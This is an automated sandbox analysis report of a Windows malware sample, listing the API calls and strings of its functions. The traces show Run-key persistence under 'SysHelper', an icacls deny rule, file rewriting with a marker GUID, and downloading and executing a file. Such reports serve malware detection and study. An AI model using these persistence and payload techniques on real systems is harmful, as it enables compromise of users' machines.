Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: eb9b6e3a56b55b9ec0b2091368e032180d056ab99cd426cc3779bf646a33140d
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: eb9b6e3a56b55b9ec0b2091368e032180d056ab99cd426cc3779bf646a33140d
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 311085bb5f21d25cc81269d1f638485d68d47ea2dd31f96a3b3f67442ef4dd82
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 311085bb5f21d25cc81269d1f638485d68d47ea2dd31f96a3b3f67442ef4dd82
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: b95a280afb5ab5b99b946805d895d13019c9a1f3055eeb8ed87e1e7914df6449
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: b95a280afb5ab5b99b946805d895d13019c9a1f3055eeb8ed87e1e7914df6449
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 2ce7e8a25c16a4969ccda2bf48f5d53057bc0210bbf1fadcc46dadeb46fe5b87
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 2ce7e8a25c16a4969ccda2bf48f5d53057bc0210bbf1fadcc46dadeb46fe5b87
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
Address: %s, mac: %s, xrefs: 0040E72D

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 02e9612f127fb412d77a5d1f2b2faf682c4a1611dcf75e79c66b72e064a0daf3
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 02e9612f127fb412d77a5d1f2b2faf682c4a1611dcf75e79c66b72e064a0daf3
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathAppendW.SHLWAPI(?,?), ref: 0040FBD5
_memmove.LIBCMT ref: 0040FC3C
PathFileExistsW.SHLWAPI(?,?,?,00000007), ref: 0040FC63
_malloc.LIBCMT ref: 0040FC72
lstrcpyW.KERNEL32(00000000,?), ref: 0040FC8C
lstrcatW.KERNEL32(00000000,?), ref: 0040FCA5
_free.LIBCMT ref: 0040FCD7

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
String ID:
API String ID: 3232302685-0
Opcode ID: 33fdd23273d2b7a8768c953ed0cfbb6ad2ff33047ae320ef19d28915fe5359b8
Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
Opcode Fuzzy Hash: 33fdd23273d2b7a8768c953ed0cfbb6ad2ff33047ae320ef19d28915fe5359b8
Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

" --AutoStart, xrefs: 00411DD1
D, xrefs: 00412128
Shell32.dll, xrefs: 00411E94
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
SHGetFolderPathW, xrefs: 00411E9F
" --AutoStart, xrefs: 004120C2
SysHelper, xrefs: 00411D5B, 004120EB
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
icacls ", xrefs: 0041214C

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: f30dcf34bb53c62781887ac512f0ce1bbcccb481947f0b90ad033f80d1989b84
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: f30dcf34bb53c62781887ac512f0ce1bbcccb481947f0b90ad033f80d1989b84
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Function 004111C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551
filestringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
MoveFileW.KERNEL32(00000000,?), ref: 00411277
VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
_memset.LIBCMT ref: 004112C8
SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
MoveFileW.KERNEL32(?,?), ref: 004116D6
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB

Strings

{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}, xrefs: 00411364, 00411666, 00411672

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
API String ID: 254274740-1186676987
Opcode ID: fc417cf10e22a9ebc44c69cf1f23fe37d3948a75a8138bb95fee337126ac7da9
Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
Opcode Fuzzy Hash: fc417cf10e22a9ebc44c69cf1f23fe37d3948a75a8138bb95fee337126ac7da9
Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69

Function 0041DBD0 Relevance: 49.6, APIs: 23, Strings: 5, Instructions: 565
networkfilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040ECB0: _strtok.LIBCMT ref: 0040ED66

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041DCF5
GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0041DD01

Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83

UuidCreate.RPCRT4(?), ref: 0041DD3C
UuidToStringA.RPCRT4(?,?), ref: 0041DD57
RpcStringFreeA.RPCRT4(00000000), ref: 0041DDB4
PathAppendA.SHLWAPI(?,00000000), ref: 0041DDD3
CreateDirectoryA.KERNEL32(?,00000000), ref: 0041DDDC
_memset.LIBCMT ref: 0041DEE7
InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0041DEFC

Part of subcall function 00412900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966

_wcsstr.LIBCMT ref: 0041DF50
InternetOpenUrlA.WININET(00000000,00000000), ref: 0041E07B

Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DD8D
Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DDB6
Part of subcall function 0040DD40: _memset.LIBCMT ref: 0040DDE4
Part of subcall function 0040DD40: lstrlenW.KERNEL32(?), ref: 0040DE0A
Part of subcall function 0040DD40: gethostbyname.WS2_32(00500134), ref: 0040DEA7

_memmove.LIBCMT ref: 0041DFDD
HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 0041E10D
lstrcpyA.KERNEL32(?,?), ref: 0041E229
PathAppendA.SHLWAPI(?,?), ref: 0041E23F
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 0041E288
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E2A0
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0041E2C7
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041E2FB
CloseHandle.KERNEL32(00000000), ref: 0041E317
InternetCloseHandle.WININET(00000000), ref: 0041E324
InternetCloseHandle.WININET(?), ref: 0041E32A
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0041E34D

Strings

Shell32.dll, xrefs: 0041DCF0
.bit/, xrefs: 0041DF45
Microsoft Internet Explorer, xrefs: 0041DEF7
$run, xrefs: 0041DEAB
SHGetFolderPathA, xrefs: 0041DCFB

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
API String ID: 1843630811-800396732
Opcode ID: ca850b2eb009462475f127208bacb838d615e8d3594796a4f1df8c7af514e1a1
Instruction ID: dcf8a581e05b5da13000ef7a953c2c15a8b95d2250363c4482f8ef8be3b44f4c
Opcode Fuzzy Hash: ca850b2eb009462475f127208bacb838d615e8d3594796a4f1df8c7af514e1a1
Instruction Fuzzy Hash: BF32C070108380EFE730DF25C845B9BBBE4AF85308F10491EF99957291D7BA9589CB9B

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

EnumProcesses, xrefs: 00412264, 00412299
EnumProcessModules, xrefs: 0041226C, 004122A1
kernel32.dll, xrefs: 0041224E
Psapi.dll, xrefs: 0041228C
GetModuleBaseNameW, xrefs: 00412277, 004122AC

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
